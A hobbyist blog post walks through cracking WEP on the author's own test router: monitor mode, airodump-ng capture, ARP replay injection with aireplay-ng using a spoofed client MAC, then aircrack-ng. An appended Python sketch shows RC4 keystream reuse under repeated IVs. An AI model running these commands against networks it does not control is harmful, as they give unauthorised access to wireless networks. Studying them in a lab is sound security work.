I’ve set up a test router here running WEP encryption, as I just got the new Alfa Networks wireless adaptor.
I’ve always had an interest in wireless security; it is pretty interesting to me. These days the dated WEP encryption is pretty weak and can be cracked fairly easily. Here I will show how it can be achieved.
For this test I am using my Raspberry Pi Zero W running Kali Linux. It is a perfect little device for wireless hacking once teamed up with the Alfa Networks wireless device.
Once booted into Kali I SSH’d into the machine, as I run it headless, and checked to see if the device was being picked up, which it was.
Once I did this I used airmon-ng to put the device into wireless monitor mode. This is a special mode in which it can view wireless traffic and also inject packets. Only special wireless devices can do this (such as the Alfa Networks device I am using).
For this test I have set up an access point running WEP, named “TALKTALK” followed by a random bunch of numbers. It is the 2nd from the top in the list below.
Once I noted down the MAC address I went ahead and used the following command to associate myself with the access point and also create a file (prefixed WEPcrack) for Aircrack-ng to use to store all the data we capture.
airodump-ng --bssid C4:07:2F:13:A3:E8 -c 7 -w WEPcrack wlan1mon
This gives the following output:
We are now associated with the access point and ready to inject our evilness… But first, we need a client to connect so we can spoof their MAC address so the access point will receive data from us.
I added a device and spoofed the MAC on my machine and ran the following command to commence the packet injection attack from what would appear to be the client MAC address.
aireplay-ng -3 -b C4:07:2F:13:A3:E8 -h 98:4B:E1:CA:4A:12 wlan1mon
The attack is now running! It’s just a short waiting game now while we spoof packets and capture data. Once complete I ran the following command.
This runs Aircrack-ng and tells it to read the file we made. If we have enough IVs, aircrack-ng will display the key on our screen, usually in hexadecimal format. Simply take that hex key and apply it when logging into the remote AP and you are in!
We have a winner!
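Why collecting IVs is the whole game, as an added illustration that is not part of the original post: WEP's IV is only 24 bits, so with random IVs a repeat is expected after a few thousand frames, and RC4 keyed with the same IV and shared key produces the same keystream, so two frames sent under one IV XOR to the XOR of their plaintexts. This is the textbook weakness behind WEP, not a description of aircrack-ng's internal statistics; the key, IV and frame contents below are constructed.

```python
import math

IV_SPACE = 1 << 24  # a WEP IV is 24 bits, so only ~16.7M distinct values exist


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (KSA + PRGA); WEP keys it with IV || shared key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(shared_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP-style frame body encryption (ICV omitted): RC4(IV || key) XOR data."""
    ks = rc4_keystream(iv + shared_key, len(plaintext))
    return bytes(p ^ k for p, k in zip(plaintext, ks))


def iv_reuse_probability(n_frames: int, space: int = IV_SPACE) -> float:
    """Birthday bound: probability that at least one IV repeats among n_frames."""
    if n_frames >= space:
        return 1.0
    log_no_repeat = sum(math.log1p(-i / space) for i in range(n_frames))
    return 1.0 - math.exp(log_no_repeat)


def frames_for_reuse_probability(p: float, space: int = IV_SPACE) -> int:
    """Approximate number of frames at which an IV repeat has probability p."""
    return math.ceil(math.sqrt(-2.0 * space * math.log(1.0 - p)))


def reused_iv_leaks_plaintext_xor(shared_key: bytes, iv: bytes, p1: bytes, p2: bytes) -> bool:
    """Same IV, same keystream: C1 ^ C2 == P1 ^ P2, so the key never mattered."""
    c1 = wep_encrypt(shared_key, iv, p1)
    c2 = wep_encrypt(shared_key, iv, p2)
    return all(a ^ b == x ^ y for a, b, x, y in zip(c1, c2, p1, p2))


if __name__ == "__main__":
    key = bytes.fromhex("0123456789")  # constructed 40-bit WEP key
    print(reused_iv_leaks_plaintext_xor(key, b"\x11\x22\x33", b"hello world", b"HELLO WORLD"))
    print(frames_for_reuse_probability(0.5))  # roughly 4800 frames for a 50% chance of a repeat
```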